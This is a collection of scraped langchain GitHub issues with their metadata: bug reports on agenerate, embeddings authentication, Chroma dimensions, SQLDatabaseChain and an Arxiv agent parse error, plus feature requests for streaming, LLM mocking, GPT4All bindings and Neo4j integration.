@hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [X] Async ### Reproduction minimum viable code to reproduce: ```python import time import asyncio from langchain.chat_models import ChatOpenAI from langchain.schema import HumanMessage, SystemMessage from keys import KEYS async def async_generate(llm): resp = await llm.agenerate( [ SystemMessage(content="you are a helpful bot"), HumanMessage(content="Hello, how are you?"), ] ) print(resp) async def generate_concurrently(): llm = ChatOpenAI( temperature=0.9, openai_api_key=KEYS["openai.api_key"], openai_organization=KEYS["openai.organization"], ) tasks = [async_generate(llm) for _ in range(3)] await asyncio.gather(*tasks) async def main(): start = time.perf_counter() await generate_concurrently() elapsed = time.perf_counter() - start print("\033[1m" + f"Concurrent executed in {elapsed:0.2f} seconds." + "\033[0m") if __name__ == "__main__": asyncio.run(main()) ``` ### Expected behavior Should produce 3 generation results.
ChatOpenAI.agenerate seems broken in 0.0.168?
https://api.github.com/repos/langchain-ai/langchain/issues/4643/comments
4
2023-05-14T00:55:12Z
2023-09-25T10:13:04Z
https://github.com/langchain-ai/langchain/issues/4643
1,708,780,067
4,643
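The `('content', 'you are a helpful bot')` tuple in the error is a clue: iterating a single message object yields `(field, value)` pairs, which happens when `agenerate` treats each *message* as a prompt. Chat-model `generate`/`agenerate` expect a list of message lists — one inner list per prompt — so the flat list in the script is one nesting level short. A minimal sketch of the shape (tuples stand in for message objects):

```python
# Tuples stand in for SystemMessage / HumanMessage objects here.
system = ("system", "you are a helpful bot")
human = ("human", "Hello, how are you?")

flat = [system, human]      # what the script passed: agenerate then treats
                            # each message as a prompt and iterates it,
                            # producing the (field, value) pairs in the error
batch = [[system, human]]   # what agenerate expects: List[List[message]]

assert len(batch) == 1 and len(batch[0]) == 2
# The corrected call would be:
#   resp = await llm.agenerate([[SystemMessage(...), HumanMessage(...)]])
```

With the extra list level, each inner list is one conversation and the three concurrent tasks each produce a generation result as expected.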
[ "langchain-ai", "langchain" ]
### System Info Google Colab ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ```python from langchain.embeddings.openai import OpenAIEmbeddings embeder = OpenAIEmbeddings(openai_api_key="redacted_api_key") query_result = embeder.embed_query("show us the embeddings") ``` causes the following error ``` AuthenticationError Traceback (most recent call last) [<ipython-input-30-45e396cd020f>](https://localhost:8080/#) in <cell line: 7>() 5 6 embeddings = OpenAIEmbeddings(openai_api_key="key") ----> 7 docsearch = Chroma.from_documents(texts,embeddings) 17 frames [/usr/local/lib/python3.10/dist-packages/openai/api_requestor.py](https://localhost:8080/#) in _interpret_response_line(self, rbody, rcode, rheaders, stream) 685 stream_error = stream and "error" in resp.data 686 if stream_error or not 200 <= rcode < 300: --> 687 raise self.handle_error_response( 688 rbody, rcode, resp.data, rheaders, stream_error=stream_error 689 ) AuthenticationError: <empty message> ``` ### Expected behavior Expected there to be no error message. I also checked that my API key is working
OpenAIEmbeddings has "AuthenticationError"
https://api.github.com/repos/langchain-ai/langchain/issues/4639/comments
1
2023-05-13T23:44:10Z
2023-05-16T20:08:06Z
https://github.com/langchain-ai/langchain/issues/4639
1,708,767,827
4,639
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. What is the best approach to creating a rule-based chatbot with LangChain? Context: I need to create a chatbot that collects some basic user info at the beginning (things like name, email, phone) and then continues providing some general responses based on custom information. Thanks in advance. ### Suggestion: _No response_
Rule based chatbot using LangChain
https://api.github.com/repos/langchain-ai/langchain/issues/4634/comments
2
2023-05-13T17:03:41Z
2023-09-10T16:18:10Z
https://github.com/langchain-ai/langchain/issues/4634
1,708,685,295
4,634
[ "langchain-ai", "langchain" ]
### Feature request Per title, request is to add feature for streaming output response, something like this: ```python from langchain.llms.huggingface_text_gen_inference import HuggingFaceTextGenInference from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler llm = HuggingFaceTextGenInference( inference_server_url='http://localhost:8010', max_new_tokens=512, top_k=10, top_p=0.95, typical_p=0.95, temperature=0.01, stop_sequences=['</s>'], repetition_penalty=1.03, stream=True ) print(llm("What is deep learning?", callbacks=[StreamingStdOutCallbackHandler()])) ``` ### Motivation Having streaming response output is useful for chat situations to reduce perceived latency for the user. Current implementation of HuggingFaceTextGenInference class implemented in [PR 4447](https://github.com/hwchase17/langchain/pull/4447) does not support streaming. ### Your contribution Feature added in [PR #4633](https://github.com/hwchase17/langchain/pull/4633)
[feature] Add support for streaming response output to HuggingFaceTextGenInference LLM
https://api.github.com/repos/langchain-ai/langchain/issues/4631/comments
0
2023-05-13T16:16:48Z
2023-05-15T14:59:14Z
https://github.com/langchain-ai/langchain/issues/4631
1,708,671,913
4,631
[ "langchain-ai", "langchain" ]
### Feature request Components containing LLM are hard to be unit-tested, because their output is not deterministic, and they rely on API which could fail. So I propose a method to mock LLM output by simply recording and replaying the responses. ### Motivation It could be helpful in TDD-based workflow, in which we want to do refactoring, without changing the behavior. ### Your contribution I've made an example in my personal project, which dumps output to JSON file. The implementation: ```python class MockOpenAI(OpenAI): from_file: Path = None to_file: Path = None records: List[LLMResult] = [] # it overrides the generate() method ``` https://github.com/ofey404/WalkingShadows/blob/2cd39f6286193845ba3018bb2bcd42a7ff736fe9/src/backend/services/world/internal/llm/llm.py#L18-L21 The usage: ```python MockOpenAI( # to_file=Path(__file__).parent / "test_world.json" from_file=Path(__file__).parent / "test_world.json" ) ``` https://github.com/ofey404/WalkingShadows/blob/2cd39f6286193845ba3018bb2bcd42a7ff736fe9/src/backend/services/world/api/world/test/test_world.py#L13C1-L17 If it's proper, I'd like to contribute it to langchain, and I would refine the interface to make it more generic. Anyone is interested in this? I'd like to find some support from maintainers.
[feature] Mock LLM by record and replay responses
https://api.github.com/repos/langchain-ai/langchain/issues/4629/comments
5
2023-05-13T15:46:06Z
2023-11-14T16:24:55Z
https://github.com/langchain-ai/langchain/issues/4629
1,708,662,472
4,629
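The record-and-replay idea can be sketched framework-free (illustrative names — this is not the langchain API proposed above, just the pattern): a wrapper that forwards prompts to a live model while recording responses, and serves the recorded file verbatim — deterministic and offline — in tests:

```python
import json
from pathlib import Path
from typing import Callable, List, Optional

class RecordReplayLLM:
    """Wrap a callable LLM: record live responses to JSON, or replay
    a previously recorded file verbatim for deterministic tests."""

    def __init__(self, llm: Optional[Callable[[str], str]] = None,
                 record_to: Optional[Path] = None,
                 replay_from: Optional[Path] = None):
        self._llm = llm
        self._record_to = record_to
        self._recorded: List[str] = []
        self._replay = (json.loads(replay_from.read_text())
                        if replay_from else None)

    def __call__(self, prompt: str) -> str:
        if self._replay is not None:
            return self._replay.pop(0)       # replay mode: no API call
        response = self._llm(prompt)         # record mode: hit the real model
        self._recorded.append(response)
        if self._record_to is not None:
            self._record_to.write_text(json.dumps(self._recorded))
        return response
```

Replaying by position (a queue of responses) keeps the mock honest for refactors that preserve the sequence of LLM calls; keying by prompt hash would be a stricter variant.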
[ "langchain-ai", "langchain" ]
### Feature request The official gpt4all python bindings now exist in the `gpt4all` pip package. [Langchain](https://python.langchain.com/en/latest/modules/models/llms/integrations/gpt4all.html) currently relies on the no-longer maintained pygpt4all package. Langchain should use the `gpt4all` python package with source found here: https://github.com/nomic-ai/gpt4all/tree/main/gpt4all-bindings/python ### Motivation The source at https://github.com/nomic-ai/gpt4all/tree/main/gpt4all-bindings/python supports multiple OS's and platforms (other bindings do not). Nomic AI will be officially maintaining these bindings. ### Your contribution I will be happy to review a pull request and ensure that future changes are PR'd upstream to langchains :)
GPT4All Python Bindings out of date [move to new multiplatform bindings]
https://api.github.com/repos/langchain-ai/langchain/issues/4628/comments
2
2023-05-13T15:15:06Z
2023-09-10T16:18:15Z
https://github.com/langchain-ai/langchain/issues/4628
1,708,650,720
4,628
[ "langchain-ai", "langchain" ]
### System Info v.0.0.167 MacOS 13.3.1 (a) (22E772610a) ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` from langchain.embeddings.openai import OpenAIEmbeddings from langchain.vectorstores import Chroma from langchain.llms import AzureOpenAI from langchain.chains import RetrievalQAWithSourcesChain from flask import Flask, request, jsonify, render_template embeddings = OpenAIEmbeddings(model="text-search-davinci-query-001",chunk_size=1) persist_directory = "db" db = Chroma(persist_directory=persist_directory, embedding_function=embeddings) retriever = db.as_retriever() llm = AzureOpenAI(deployment_name="foo") chain = RetrievalQAWithSourcesChain.from_chain_type(llm=llm, chain_type="stuff", retriever=retriever) while True: question = input(f"Ask a question: ") answer = chain({"question": question}, return_only_outputs=True) print(answer) ``` ### Expected behavior In 0.0.123 the above snippet works. In 0.0.167, I get the following: ``` swlib.py", line 119, in _check_dimensionality raise InvalidDimensionException( chromadb.errors.InvalidDimensionException: Dimensionality of (1536) does not match index dimensionality (12288) ```
`chromadb.errors.InvalidDimensionException` introduced somewhere between v0.0.123 and 0.0.167
https://api.github.com/repos/langchain-ai/langchain/issues/4627/comments
3
2023-05-13T14:58:47Z
2023-10-16T16:08:04Z
https://github.com/langchain-ai/langchain/issues/4627
1,708,641,207
4,627
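The two numbers in the exception are informative: 12288 is the output width of the `text-search-davinci-*` embedding models and 1536 is that of `text-embedding-ada-002`. A persisted Chroma collection keeps the dimensionality it was indexed with, so the `db` directory was built with davinci-sized vectors while queries now arrive ada-002-sized; the fix is to re-embed the collection or make the query-time model match the index. A small compatibility check (the dimension table is an assumption from published model specs):

```python
# Assumed embedding widths for the two models involved:
EMBEDDING_DIMS = {
    "text-search-davinci-query-001": 12288,
    "text-embedding-ada-002": 1536,
}

def compatible(query_model: str, index_dim: int) -> bool:
    # Chroma raises InvalidDimensionException when these differ.
    return EMBEDDING_DIMS[query_model] == index_dim

assert compatible("text-search-davinci-query-001", 12288)
assert not compatible("text-embedding-ada-002", 12288)
```

Running such a check before `as_retriever()` turns the late `InvalidDimensionException` into an early, explicit configuration error.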
[ "langchain-ai", "langchain" ]
### Feature request There is a need for graph databases to be integrated into langchain. NetworkX isn't suitable for scalable graph databases that need to be queried, particularly with tens of thousands or more nodes and edges. This is necessary for graph databases to compete with vector databases on an equal footing for information extraction within langchain. There is already a [medium article](https://towardsdatascience.com/integrating-neo4j-into-the-langchain-ecosystem-df0e988344d2) and a [GitHub repo](https://github.com/tomasonjo/langchain2neo4j) describing one way this has been implemented, but it would be ideal if something like this were integrated into langchain itself. That implementation also offers Neo4j as an embeddings store, which should be supported as well. ### Motivation The [Graph Index Creator](https://python.langchain.com/en/latest/modules/chains/index_examples/graph_qa.html?highlight=GraphIndexCreator) and other small graph utilities within LangChain use NetworkX, which isn't scalable in production for full-blown knowledge graphs on the scale of the vector databases. I have a particular need to use a graph database in production along with langchain for a work project. ### Your contribution Yes, I am willing to contribute. I haven't contributed to LangChain directly before, but I am familiar with the source code from investigating it. I would love to collaborate on what kind of framework/interface we would need to expand graph indexes to a similar scope as vector database indexes.
Integrate Neo4j as a Graph Index, Vector Index, and as tools in the ecosystem
https://api.github.com/repos/langchain-ai/langchain/issues/4625/comments
10
2023-05-13T13:47:57Z
2023-06-12T14:29:19Z
https://github.com/langchain-ai/langchain/issues/4625
1,708,610,568
4,625
[ "langchain-ai", "langchain" ]
### System Info --------------------------------------------------------------------------- ValidationError Traceback (most recent call last) [<ipython-input-54-a735363693fb>](https://localhost:8080/#) in <cell line: 2>() 1 # sql chain ----> 2 db_chain = SQLDatabaseChain.from_llm(llm, db, 3 return_intermediate_steps=False, # returns query and steps 4 verbose=True, use_query_checker=True, # self-correcting small mistakes 5 top_k=3 # limit the number of rows returned 1 frames /usr/local/lib/python3.10/dist-packages/pydantic/main.cpython-310-x86_64-linux-gnu.so in pydantic.main.BaseModel.__init__() ValidationError: 1 validation error for SQLDatabaseChain use_query_checker extra fields not permitted (type=value_error.extra) ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction from __future__ import annotations import warnings from typing import Any, Dict, List, Optional from pydantic import Extra, Field, root_validator from langchain.base_language import BaseLanguageModel from langchain.callbacks.manager import CallbackManagerForChainRun from langchain.chains.base import Chain from langchain.chains.llm import LLMChain from langchain.chains.sql_database.prompt import DECIDER_PROMPT, PROMPT, SQL_PROMPTS from langchain.prompts.base import BasePromptTemplate from langchain.prompts.prompt import PromptTemplate from langchain.sql_database import SQLDatabase from langchain.tools.sql_database.prompt import QUERY_CHECKER # initialize database llm = OpenAI(temperature=0) db = SQLDatabase.from_uri("sqlite:////content/drive/My Drive/09PHD/sql-murder-mystery.db", 
sample_rows_in_table_info=1, # examples of rows from each table, consumes tokens # custom_table_info=custom_table_info # we can define custom table info which will override the default sample_rows_in_table_info parameter ) # sql chain db_chain = SQLDatabaseChain.from_llm(llm, db, return_intermediate_steps=False, # returns query and steps verbose=True, # use_query_checker=True, # self-correcting small mistakes NOT WORKING top_k=3 # limit the number of rows returned ) ### Expected behavior The use_query_checker=True parameter in SQLDatabaseChain spits out an error.
use_query_checker in SQLDatabaseChain not working
https://api.github.com/repos/langchain-ai/langchain/issues/4624/comments
4
2023-05-13T12:52:25Z
2023-09-19T16:11:02Z
https://github.com/langchain-ai/langchain/issues/4624
1,708,593,108
4,624
[ "langchain-ai", "langchain" ]
### System Info I was trying out the langchain arxiv chain and I got the cannot parse LLM error. Here is some additional info that might help. ` > Entering new AgentExecutor chain... I need to search for papers related to AI in the oil and gas industry. Action: Arxiv Action Input: "AI in oil and gas industry" Observation: Published: 2023-04-27 Title: Industrial Engineering with Large Language Models: A case study of ChatGPT's performance on Oil & Gas problems Authors: Oluwatosin Ogundare, Srinath Madasu, Nathanial Wiggins Summary: Large Language Models (LLMs) have shown great potential in solving complex problems in various fields, including oil and gas engineering and other industrial engineering disciplines like factory automation, PLC programming etc. However, automatic identification of strong and weak solutions to fundamental physics equations governing several industrial processes remain a challenging task. This paper identifies the limitation of current LLM approaches, particularly ChatGPT in selected practical problems native to oil and gas engineering but not exclusively. The performance of ChatGPT in solving complex problems in oil and gas engineering is discussed and the areas where LLMs are most effective are presented. Published: 2022-02-23 Title: Cybersecurity Challenges in the Offshore Oil and Gas Industry: An Industrial Cyber-Physical Systems (ICPS) Perspective Authors: Abubakar Sadiq Mohammed, Philipp Reinecke, Pete Burnap, Omer Rana, Eirini Anthi Summary: The offshore oil and gas industry has recently been going through a digitalisation drive, with use of `smart' equipment using technologies like the Industrial Internet of Things (IIoT) and Industrial Cyber-Physical Systems (ICPS). There has also been a corresponding increase in cyber attacks targeted at oil and gas companies. Oil production offshore is usually in remote locations, requiring remote access and control. 
This is achieved by integrating ICPS, Supervisory, Control and Data Acquisition (SCADA) systems, and IIoT technologies. A successful cyber attack against an oil and gas offshore asset could have a devastating impact on the environment, marine ecosystem and safety of personnel. Any disruption to the world's supply of oil and gas (O\&G) can also have an effect on oil prices and in turn, the global economy. This makes it important to secure the industry against cyber threats. We describe the potential cyberattack surface within the oil and gas industry, discussing emerging trends in the offshore sub-sector, and provide a timeline of known cyberattacks. We also present a case study of a subsea control system architecture typically used in offshore oil and gas operations and highlight potential vulnerabilities affecting the components of the system. This study is the first to provide a detailed analysis on the attack vectors in a subsea control system and is crucial to understanding key vulnerabilities, primarily to implement efficient mitigation methods that safeguard the safety of personnel and the environment when using such systems. Published: 2017-05-11 Title: Cloud-based Fault Detection and Classification for Oil & Gas Industry Authors: Athar Khodabakhsh, Ismail Ari, Mustafa Bakir Summary: Oil & Gas industry relies on automated, mission-critical equipment and complex systems built upon their interaction and cooperation. To assure continuous operation and avoid any supervision, architects embed Distributed Control Systems (DCS), a.k.a. Supervisory Control and Data Acquisition (SCADA) systems, on top of their equipment to generate data, monitor state and make critical online & offline decisions. 
In this paper, we propose a new Lambda architecture for oil & gas industry for unified data and analytical processing on data received from DCS, discuss cloud integration issues and share our experiences with the implementation of sensor fault-detection and classification modules inside the proposed architecture. Thought:I have found three papers related to AI in the oil and gas industry, but I need to narrow down my search to find the best ones. Action: Arxiv Action Input: "Best papers on AI in oil and gas industry" Observation: Published: 2023-04-27 Title: Industrial Engineering with Large Language Models: A case study of ChatGPT's performance on Oil & Gas problems Authors: Oluwatosin Ogundare, Srinath Madasu, Nathanial Wiggins Summary: Large Language Models (LLMs) have shown great potential in solving complex problems in various fields, including oil and gas engineering and other industrial engineering disciplines like factory automation, PLC programming etc. However, automatic identification of strong and weak solutions to fundamental physics equations governing several industrial processes remain a challenging task. This paper identifies the limitation of current LLM approaches, particularly ChatGPT in selected practical problems native to oil and gas engineering but not exclusively. The performance of ChatGPT in solving complex problems in oil and gas engineering is discussed and the areas where LLMs are most effective are presented. Published: 2017-05-11 Title: Cloud-based Fault Detection and Classification for Oil & Gas Industry Authors: Athar Khodabakhsh, Ismail Ari, Mustafa Bakir Summary: Oil & Gas industry relies on automated, mission-critical equipment and complex systems built upon their interaction and cooperation. To assure continuous operation and avoid any supervision, architects embed Distributed Control Systems (DCS), a.k.a. 
Supervisory Control and Data Acquisition (SCADA) systems, on top of their equipment to generate data, monitor state and make critical online & offline decisions. In this paper, we propose a new Lambda architecture for oil & gas industry for unified data and analytical processing on data received from DCS, discuss cloud integration issues and share our experiences with the implementation of sensor fault-detection and classification modules inside the proposed architecture. Published: 2019-02-26 Title: Intelligent Internet of Things (IoT) Node Demonstrator for Device Monitoring and Control in the Oil and Gas Sector Authors: Stephen Ugwuanyi, James Irvine Summary: Internet of Things (IoT) is the new industrial slogan for connecting intelligent and unintelligent devices to the web. The problem of security of data transfer, interoperability of different proposed methodologies, the ubiquity of Wi-Fi and the development of low power consuming MCUs has broadened the search for the best alternative technology for IoT in the oil and gas sector. This paper focus on the communication method for IoT devices to determine the level of functionality and the efficiency of interfacing the new MOD-WIFI-ESP8266-DEV Wi-Fi unit based on the IEEE 802.11 standard with MSP430 by Texas Instrument. The system controls LEDs and monitors Temperature/Humidity sensor (DHT11) using Android application and web service. The system presents in three-layered structure an ecosystem of lightweight, small size, reduced cost and low power IoT system. It is expected that industries/users of this system would be able to control, monitor, and analyse data generated by the web of connected devices. 
Thought: --------------------------------------------------------------------------- OutputParserException Traceback (most recent call last) [<ipython-input-4-ef16113c8f19>](https://localhost:8080/#) in <cell line: 1>() ----> 1 agent_chain.run( 2 "What are some of the best papers on AI in oil an gas industry??", 3 ) 7 frames [/usr/local/lib/python3.10/dist-packages/langchain/agents/mrkl/output_parser.py](https://localhost:8080/#) in parse(self, text) 24 match = re.search(regex, text, re.DOTALL) 25 if not match: ---> 26 raise OutputParserException(f"Could not parse LLM output: `{text}`") 27 action = match.group(1).strip() 28 action_input = match.group(2) OutputParserException: Could not parse LLM output: `Based on the summaries, the best papers on AI in the oil and gas industry are "Industrial Engineering with Large Language Models: A case study of ChatGPT's performance on Oil & Gas problems" and "Cloud-based Fault Detection and Classification for Oil & Gas Industry".` ` ### Who can help? @hwchase17 , @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Input : agent_chain.run( "What are some of the best papers on AI in oil an gas industry??", ) ### Expected behavior A proper answer as provided by an LLM.
Arxiv chain : cannot parse output
https://api.github.com/repos/langchain-ai/langchain/issues/4622/comments
1
2023-05-13T11:43:21Z
2023-09-10T16:18:20Z
https://github.com/langchain-ai/langchain/issues/4622
1,708,571,207
4,622
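The traceback shows the MRKL output parser failing a regex match: the model ended with a prose conclusion that contains neither an `Action:`/`Action Input:` pair nor a `Final Answer:` prefix, so the agent has nothing it can execute or return. The expectation can be reproduced in isolation (regex approximated from the traceback, not copied from the library):

```python
import re

# Approximation of what the MRKL agent's parser looks for:
ACTION_RE = re.compile(
    r"Action\s*\d*\s*:\s*(.*?)\s*Action\s*\d*\s*Input\s*\d*\s*:\s*(.*)",
    re.DOTALL,
)

tool_step = 'Action: Arxiv\nAction Input: "AI in oil and gas industry"'
prose = ("Based on the summaries, the best papers on AI in the oil and "
         "gas industry are ...")

assert ACTION_RE.search(tool_step) is not None   # parses as a tool call
assert ACTION_RE.search(prose) is None           # -> OutputParserException
```

Workarounds in that era typically amount to catching `OutputParserException` and surfacing the raw text, or prompting the model more firmly to always close with a `Final Answer:` line.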
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi. I have used an integration of langchain with Pinecone, as well as ChromaDB. My question is: do you recommend any alternative vector database that is free? ### Suggestion: _No response_
Issue: Free Vector Database?
https://api.github.com/repos/langchain-ai/langchain/issues/4621/comments
4
2023-05-13T10:03:49Z
2023-09-19T16:11:06Z
https://github.com/langchain-ai/langchain/issues/4621
1,708,544,666
4,621